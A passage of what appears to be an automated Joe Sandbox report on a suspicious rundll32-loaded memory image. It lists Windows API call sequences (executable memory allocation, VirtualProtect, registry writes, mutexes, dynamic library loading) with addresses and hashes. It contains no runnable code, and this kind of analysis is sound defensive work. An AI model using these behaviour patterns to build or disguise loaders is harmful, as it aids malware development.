                                                            • Part of subcall function 05581DB7: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05581DD1
                                                            • Part of subcall function 05581DB7: CreateWaitableTimerA.KERNEL32(0559C1A8,00000001,?), ref: 05581DEE
                                                            • Part of subcall function 05581DB7: GetLastError.KERNEL32(?,00000000,05587801,00000000,00000000,00008008,?,?,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05581DFF
                                                            • Part of subcall function 05581DB7: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E3F
                                                            • Part of subcall function 05581DB7: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E5E
                                                            • Part of subcall function 05581DB7: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E74
                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05592191
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 0559219A
                                                            • Part of subcall function 0558EC07: CreateMutexA.KERNEL32(0559C1A8,00000000,?,?,055920B0,?,?,00000000,?,?,?), ref: 0558EC37
                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 055921B5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                          • String ID:
                                                          • API String ID: 1700416623-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 0558BAB9
                                                            • Part of subcall function 05592015: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05577083), ref: 0559203B
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001), ref: 0558BAFB
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 0558BB4D
                                                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,?,?,?,00000001), ref: 0558BB66
                                                            • Part of subcall function 05580373: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05580394
                                                            • Part of subcall function 05580373: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 055803D7
                                                          • GetLastError.KERNEL32 ref: 0558BB9E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                          • String ID:
                                                          • API String ID: 1921436656-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 05588698
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 055886B1
                                                          • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 055886BE
                                                          • lstrlen.KERNEL32(0559D3A4,?,?,?,?,?,00000000,00000000,?), ref: 055886D0
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000000,?), ref: 05588701
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                          • String ID:
                                                          • API String ID: 2734445380-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05584045: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0558404D
                                                            • Part of subcall function 05584045: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05584062
                                                            • Part of subcall function 05584045: InterlockedIncrement.KERNEL32(0000001C), ref: 0558407B
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05576BE9
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05576BFA
                                                          • lstrcmpi.KERNEL32(00000002,?), ref: 05576C40
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05576C54
                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 05576C9A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 733514052-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05586FEB: lstrlen.KERNEL32(?,00000000,?,00000000,05592373,?,?,00000000,?,05582161,?,?,?,?), ref: 05586FF7
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 05573F94
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05573FA7
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05573FB8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 05574023
                                                          • InterlockedIncrement.KERNEL32(0559C33C), ref: 0557403A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 3915436794-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,7519F560,00000000,00000000,0558D369,00000000,00000000), ref: 0558D875
                                                          • LoadLibraryA.KERNEL32(?), ref: 0558D88A
                                                          • LoadLibraryA.KERNEL32(?), ref: 0558D8A6
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558D8BB
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558D8CF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AddressProc
                                                          • String ID:
                                                          • API String ID: 1469910268-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 055778A9
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 055778B2
                                                          • GetLastError.KERNEL32 ref: 055778BC
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0557797B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3543646443-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0557D520: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0557D52C
                                                            • Part of subcall function 0557D520: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0557D542
                                                            • Part of subcall function 0557D520: _snwprintf.NTDLL ref: 0557D567
                                                            • Part of subcall function 0557D520: CreateFileMappingW.KERNEL32(000000FF,0559C1A8,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0557D583
                                                            • Part of subcall function 0557D520: GetLastError.KERNEL32 ref: 0557D595
                                                            • Part of subcall function 0557D520: CloseHandle.KERNEL32(00000000), ref: 0557D5CD
                                                          • UnmapViewOfFile.KERNEL32(?,?,?), ref: 05573BD8
                                                          • CloseHandle.KERNEL32(?), ref: 05573BE1
                                                          • SetEvent.KERNEL32(?,?,?), ref: 05573C28
                                                          • GetLastError.KERNEL32(0557D203,00000000,00000000), ref: 05573C57
                                                          • CloseHandle.KERNEL32(00000000,0557D203,00000000,00000000), ref: 05573C67
                                                            • Part of subcall function 0557B585: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05579C46,?), ref: 0557B591
                                                            • Part of subcall function 0557B585: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05579C46,?), ref: 0557B5B9
                                                            • Part of subcall function 0557B585: memset.NTDLL ref: 0557B5CB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1106445334-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0558820A,00000000,?,?), ref: 05580556
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 05580566
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0558820A,00000000,?,?,?,00000000,?,05582174), ref: 05580592
                                                          • GetLastError.KERNEL32(?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 055805B7
                                                          • CloseHandle.KERNEL32(000000FF,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 055805C8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastReadSize
                                                          • String ID:
                                                          • API String ID: 3577853679-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C), ref: 05571B6F
                                                          • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 05571B88
                                                          • StrTrimA.SHLWAPI(?,?), ref: 05571BB0
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 05571BBF
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 05571BF6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim$FreeHeap
                                                          • String ID:
                                                          • API String ID: 2132463267-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 0557A583
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?), ref: 0557A5B3
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557A5C2
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 0557A5E0
                                                          • GetLastError.KERNEL32(?,?), ref: 0557A5F0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 055840DE
                                                          • GetLastError.KERNEL32 ref: 05584101
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05584114
                                                          • GetLastError.KERNEL32 ref: 0558411F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05584167
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1671499436-0
                                                          • Opcode ID: 185c69a9a13981c1b52e3dd01f7e7e9ef7b8f4f23b6572ac9459f0bdbb84c28d
                                                          • Instruction ID: ded50f2f662f023a8450d95d47456260d3881f8c5391ad7ee88e74242d6dcc63
                                                          • Opcode Fuzzy Hash: 185c69a9a13981c1b52e3dd01f7e7e9ef7b8f4f23b6572ac9459f0bdbb84c28d
                                                          • Instruction Fuzzy Hash: AA219D30504245EBEF20AF50DD8AB6A7FBAFB50359F210419F512A65A0DB79B988DB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0557E8B6
                                                          • memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000), ref: 0557E8DF
                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0557E908
                                                          • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000), ref: 0557E928
                                                          • RegCloseKey.ADVAPI32(00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0557E933
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2954810647-0
                                                          • Opcode ID: 4b01874adf8297c826f2e5e20088d41f4cca5a758428ea025f0fdba2b5ed37fc
                                                          • Instruction ID: 53f3a274d5c94d394ed11bc595d89ecb1ad371f406441ad6179ffb15349464d0
                                                          • Opcode Fuzzy Hash: 4b01874adf8297c826f2e5e20088d41f4cca5a758428ea025f0fdba2b5ed37fc
                                                          • Instruction Fuzzy Hash: 5D11A73221420DFBDF215E74BC46EBA7A6EFB44651F050026FD01E2190DA718D209A61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05577C31
                                                          • memcpy.NTDLL(?,?,00000009), ref: 05577C53
                                                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 05577C6B
                                                          • lstrlenW.KERNEL32(?,00000001,?), ref: 05577C8B
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 05577CB0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3065863707-0
                                                          • Opcode ID: 594861de9fbf5b6614d07e1cb7fbd9cdd55d4f509e2f4b70bb34c48befe0acc2
                                                          • Instruction ID: 559c4d6b42a619babb05ef1b61df0b923052d663f91796ac2a0c07946c334c62
                                                          • Opcode Fuzzy Hash: 594861de9fbf5b6614d07e1cb7fbd9cdd55d4f509e2f4b70bb34c48befe0acc2
                                                          • Instruction Fuzzy Hash: FD119336A1020DBBCB209BA5E84AF9E7FBCEB4C310F014052FA05E2280DA74D64CDB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 0557B0D7
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557B0E4
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 0557B0F7
                                                          • lstrcmpi.KERNEL32(0559C340,00000000), ref: 0557B117
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557B897,00000000), ref: 0557B12B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 1266740956-0
                                                          • Opcode ID: 78617caa0390a366ed1cca95180bdcecc409302f3f424af416631996dda5e642
                                                          • Instruction ID: eb78957e5fc4b15a88bee59cdbb21c40958bd94edc1143c806db2121cf401ab8
                                                          • Opcode Fuzzy Hash: 78617caa0390a366ed1cca95180bdcecc409302f3f424af416631996dda5e642
                                                          • Instruction Fuzzy Hash: 93115131910209EFDF04DB59D845A9ABBF8FF04324F454156F40AD3250DB38AD09DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05576149,00000000,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 05589E15
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05589E39
                                                          • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 05589E40
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05589E88
                                                          • lstrcat.KERNEL32(00000000,?), ref: 05589E97
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 2616531654-0
                                                          • Opcode ID: bdb9c743a388fecd806eb2e6b257b926c774b596bacc7739d4934208788ffc3a
                                                          • Instruction ID: 8333d81ebaba522c1a14a90ca21f835ff945190a5217c305bba811aea03195bc
                                                          • Opcode Fuzzy Hash: bdb9c743a388fecd806eb2e6b257b926c774b596bacc7739d4934208788ffc3a
                                                          • Instruction Fuzzy Hash: BB117076204206ABD7209AA6A889E7B7FFDBB84650F05452AF54AE3100DF28E8499761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05586FEB: lstrlen.KERNEL32(?,00000000,?,00000000,05592373,?,?,00000000,?,05582161,?,?,?,?), ref: 05586FF7
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0557633B
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0557634E
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557635F
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05576374
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 055763AC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 2349942465-0
                                                          • Opcode ID: fe5214f78bbb92ec9007da2fa4572012ccfdbafc8c001776b1e83514ba1b9139
                                                          • Instruction ID: 07aaffc1b93ab9f54f1619378c856a2f1cd7ce252121e74dab4b054082ed9d27
                                                          • Opcode Fuzzy Hash: fe5214f78bbb92ec9007da2fa4572012ccfdbafc8c001776b1e83514ba1b9139
                                                          • Instruction Fuzzy Hash: C811E576214315AFDB105F24FC89C2B7FA9FB85322702013AF80693200CE39AC09DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(05571A31,00000000,?,00000000,?,0557A44D,?,05571A31,00000000), ref: 05593D28
                                                          • lstrlen.KERNEL32(?,?,0557A44D,?,05571A31,00000000), ref: 05593D2F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 05593D3D
                                                            • Part of subcall function 055762C0: GetLocalTime.KERNEL32(0557A44D,0557A44D,?,05571A31,00000000), ref: 055762CA
                                                            • Part of subcall function 055762C0: wsprintfA.USER32 ref: 055762FD
                                                          • wsprintfA.USER32 ref: 05593D5F
                                                            • Part of subcall function 05581EB1: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,05593D87,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05581ECF
                                                            • Part of subcall function 05581EB1: wsprintfA.USER32 ref: 05581EF4
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05593D90
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                          • String ID:
                                                          • API String ID: 3847261958-0
                                                          • Opcode ID: 52a8996b61e82d5f9db1bcf6cfa9ea596a6d0f5f0e3fd707c33f3f322010dd71
                                                          • Instruction ID: 3072ec962ffb1562feba6f5ad9492f255a2a96ab58b6a231ddd441b5be0e386c
                                                          • Opcode Fuzzy Hash: 52a8996b61e82d5f9db1bcf6cfa9ea596a6d0f5f0e3fd707c33f3f322010dd71
                                                          • Instruction Fuzzy Hash: FA018831140219FBDF112F56EC49DAA7F6DFFC43B0B024412FD1996110DA3A9959DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0557EE54
                                                            • Part of subcall function 05588A11: wcstombs.NTDLL ref: 05588ACF
                                                          • lstrlen.KERNEL32(?,?,?,?,?,0558CAD6,00000000,00000000), ref: 0557EE77
                                                          • lstrlen.KERNEL32(?,?,?,?,0558CAD6,00000000,00000000), ref: 0557EE81
                                                          • memcpy.NTDLL(?,?,00004000,?,?,0558CAD6,00000000,00000000), ref: 0557EE92
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,0558CAD6,00000000,00000000), ref: 0557EEB4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                                                          • String ID:
                                                          • API String ID: 1256246205-0
                                                          • Opcode ID: 45c3c2325f6c54badc58ff2104554b43d900a28bb4afae61dcd0e002919655fa
                                                          • Instruction ID: a9633b2a7b37d601ef3162bef5ea016d414d5a7b2fd6175ae3ce9135b8f3a332
                                                          • Opcode Fuzzy Hash: 45c3c2325f6c54badc58ff2104554b43d900a28bb4afae61dcd0e002919655fa
                                                          • Instruction Fuzzy Hash: 9E118E75610208EFDB109F65EC46F6ABFB9FB84360F1148A9F906A3250D731A9489B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,05577CF7,?), ref: 055760CE
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 055760E0
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 055760FD
                                                          • lstrlenW.KERNEL32(00000000,?,?,05577CF7,?), ref: 05576109
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 0557611D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                                          • String ID:
                                                          • API String ID: 3403466626-0
                                                          • Opcode ID: 1fbc757a566c0e5c81b54e3aeb2113129557bb56139d219a5230d9b0f0d12aa1
                                                          • Instruction ID: 8d1dc59ed5bd5657dae6dd1c87af17f5a2f28b8ae015a785709fbec0ccc37756
                                                          • Opcode Fuzzy Hash: 1fbc757a566c0e5c81b54e3aeb2113129557bb56139d219a5230d9b0f0d12aa1
                                                          • Instruction Fuzzy Hash: A7019E72110208EFDB11AB99EC8AF9E7BACFF09324F020012F50597151DF78A90CEBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 055838C4
                                                          • GetModuleHandleA.KERNEL32 ref: 055838D2
                                                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 055838DF
                                                          • GetModuleHandleA.KERNEL32 ref: 055838F6
                                                          • GetModuleHandleA.KERNEL32 ref: 05583902
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HandleModule$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1178273743-0
                                                          • Opcode ID: c86acb440b483b02c154705ef61a566470d619d2d6b62c533172cdc36e643d63
                                                          • Instruction ID: 139445d229b301f366d19a6ee7f436599abbdc1e348b4a1622b2aa9beb481690
                                                          • Opcode Fuzzy Hash: c86acb440b483b02c154705ef61a566470d619d2d6b62c533172cdc36e643d63
                                                          • Instruction Fuzzy Hash: A301623171430A9BAB01AF69EC42D767FADFB446B0706043BF915D2260DFA6DC25EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 05576B50
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 05576B61
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,055740DA,00000000,?,0559C328,0558046F,00000003,?,?,?,0557CC1E), ref: 05576B78
                                                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,055740DA,00000000,?,0559C328,0558046F,00000003,?,?,?,0557CC1E), ref: 05576B92
                                                          • GetLastError.KERNEL32(?,?,055740DA,00000000,?,0559C328,0558046F,00000003,?,?,?,0557CC1E,00000000,?,00000029,0559C140), ref: 05576B9F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
